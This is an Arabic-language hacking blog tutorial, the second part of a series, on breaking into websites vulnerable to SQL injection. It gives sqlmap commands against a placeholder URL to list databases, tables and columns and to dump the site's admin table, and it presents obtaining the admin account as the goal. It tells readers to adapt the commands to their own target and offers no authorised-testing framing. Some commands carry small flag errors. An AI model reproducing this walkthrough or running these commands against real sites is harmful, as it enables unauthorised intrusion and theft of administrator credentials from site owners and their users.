الرئيسية hack اختراق المواقع المصابة بثغرة sql injection الجزء 2

اختراق المواقع المصابة بثغرة sql injection الجزء 2

avril 02, 2020 ,hack

السلام عليكم ورحمة الله تعالى

تابع لدرسنا السابق

في درسنا السابق تعلمنا كيفية استخراج و معرفة المواقع المصابة بثغرة و شرحنا بعض الادوات التي تسهل علينا العماية

اليوم شرحنا هو عن كيفية اختراق قاعدة البيانات و اختراق كلمة سر مدير الموقع

تابعو معي الخطوات

لنقل ان لديك رابط مثل هذا

http://target.com/index.php?id=4

وقمت بتحقق منه و الموقع بالفعل مصاب بثغرة

سنشرع الان بالاختراق تابعو معي الخطوات

هذا الامر لاستخراج قواعد البيانات

ملاحظة يجب عليك تغيير معلومات الاوامر حسب هدفك

sqlmap -u http://target.com/index.php?id=4 –dbs

كما موضح في الصورة النتيجة تكون على هذا النحو

ولان هذا الامر لستخراج الجداول في قاعدة البيانات

فقط قم بتغير اسم قاعدة البيانات في هذا الامر حسب اسم قاعدة بيانات موقعك

sqlmap -u http://target.com/index.php?id=4 -D DatabaseName –tables

ونتحصل على مثل هذه النتيجة ولان غير اسم الجدول في الامر التالي لنستخرج الاعمدة

sqlmap -u http://target.com/index.php?id=4 -T admin –columns

وهذا اخر امر نقوم به لستخراج البيانات

sqlmap -u http://target.com/index.php?id=4 -T admin -U test –dump

كما ترون تم اختراق وتحصلنا على حساب الادمن

سنكمل الدرس في الجزء القادم ان شاء الله واي استفسار حطوه فالتعليقات

او

فيسبوك

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)

صمم بواسطة | Sora طور بواسطة موقع التقنية الحرة